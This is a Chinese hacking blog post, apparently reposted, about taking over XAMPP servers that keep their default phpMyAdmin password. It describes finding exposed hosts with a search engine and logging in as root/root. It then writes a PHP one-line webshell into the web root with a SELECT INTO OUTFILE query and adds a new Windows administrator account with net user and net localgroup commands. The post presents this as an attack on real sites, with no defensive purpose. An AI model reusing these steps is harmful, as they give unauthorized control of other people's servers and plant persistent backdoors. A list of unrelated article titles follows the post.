xampp默认配置拿shell
xampp默认配置拿shell
首先我们先来科普一下xampp(Apache+MySQL+PHP+PERL)是一个功能强大的建 XAMPP 软件站集成软件包 是一个易于安装且包含 MySQL、PHP 和 Perl 的 Apache 发行版。XAMPP 的确非常容易安装和使用:只需下载,解压缩,启动即可。 然后在安装xampp的过程中 很多网站管理员对于mysql数据库密码 都会直接 默认 所以 就照成了这个漏洞的产生
好了 废话不多说 我们直接上神器钟馗之眼 server-status – server-info – phpmyadmin 账号密码: root/root port:80
如图找到一个网站 进去 初始的phpinfo 箭头指的是phpmyadmin的登陆地址
我们记下网站根目录C:/Program Files (x86)/xampp/xampps/htdocs
点进去之后我们输入 默认的用户名和密码 root root
进去之后我们呢输入sql语句 select ‘php一句话’ into outfile ‘C:/Program Files (x86)/xampp/xampps/htdocs/mgsrc.php’ 写入一句话
菜刀连之 然后我们在说一下提权
(1)首先输入命令添加用户:
net user test01 Mgs?1234567890 /add
(2)将普通用户加入到超级管理组administrators
然后输入net localgroup administrators mgsrc1 /add
(ps:在提权的时候 也走了很多弯路 这台服务器 的密码策略没关闭 所以 密码组合必须为一个大写字母 加一个符号然后加数字 而且 这台服务器 密码位数不能超过14位 不然就无响应)
文章转发地址:http://www.hackdig.com/04/hack-34524.htm
最新文章
- 横向滑动的GridView
- 向NFV过渡 这三个坑我替你趟了
- 【BZOJ 1492】【NOI 2007】货币兑换Cash
- Jquery DOM元素的方法
- iOS 开发 - 改善APP的流畅度 (绘制股票行情)
- cocos代码研究(1)sprite学习笔记
- jQuery控制CSS样式
- MS Sqlserver 备份数据库SQL
- TRF7960天线参数试验
- DFBle.swift
- tomcat使用说明
- Bootstrap Collapse使用
- Node.js学习笔记3(快速入门)
- 数据库读写分离Amoeba
- redis3.2新功能--GEO地理位置命令介绍
- MySQL中的内置系统函数
- pilicat-dfs 霹雳猫-分布式文件系统
- noip模拟【ping】
- ubuntu18.04配置nvidia docker和远程连接ssh+远程桌面连接(二)
- 【CNN】卷积神经网络